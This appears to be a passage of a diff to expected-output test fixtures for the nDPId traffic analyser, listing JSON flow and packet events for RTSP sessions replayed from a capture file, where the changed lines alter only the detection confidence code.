00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1627567338841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1627567338841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXFEAAfwaNoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567338841,"flow_last_seen":1627567338851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567338851,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567338841,"flow_last_seen":1627567338851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567338851,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567398644,"flow_last_seen":1627567398644,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567398644,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1627567398644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1627567398644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1627567398644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567398644,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXQ0AAfwaNcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567398644,"flow_last_seen":1627567398650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567398650,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567398644,"flow_last_seen":1627567398650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567398650,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567406342,"flow_last_seen":1627567406342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567406342,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1627567406342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1627567406342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1627567406342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXW0AAfwaNWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1627567406342,"flow_last_seen":1627567406849,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1627567406849,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
-00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":381,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":49,"midstream":1,"thread_ts_msec":1627567407043,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1627567406342,"flow_last_seen":1627567406849,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1627567406849,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":381,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":49,"midstream":1,"thread_ts_msec":1627567407043,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567466882,"flow_last_seen":1627567466882,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567466882,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1627567466882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466882,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1627567466883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1627567466883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXikAAfwaNKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567466882,"flow_last_seen":1627567466894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567466894,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
-00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567279015,"flow_last_seen":1627567337247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1627567467094,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567466882,"flow_last_seen":1627567466894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567466894,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567279015,"flow_last_seen":1627567337247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1627567467094,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567528106,"flow_last_seen":1627567528106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567528106,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1627567528106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAMAAQAGAAwp8x5yLpgIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1627567528106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1627567528106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXuEAAfwaM\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567528106,"flow_last_seen":1627567528113,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567528113,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
-00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567338841,"flow_last_seen":1627567397146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567398644,"flow_last_seen":1627567406309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
-00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1627567406342,"flow_last_seen":1627567465366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11300,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1627567466882,"flow_last_seen":1627567526623,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11332,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
-00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567528106,"flow_last_seen":1627567528308,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567528106,"flow_last_seen":1627567528113,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567528113,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567338841,"flow_last_seen":1627567397146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567398644,"flow_last_seen":1627567406309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1627567406342,"flow_last_seen":1627567465366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11300,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1627567466882,"flow_last_seen":1627567526623,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11332,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 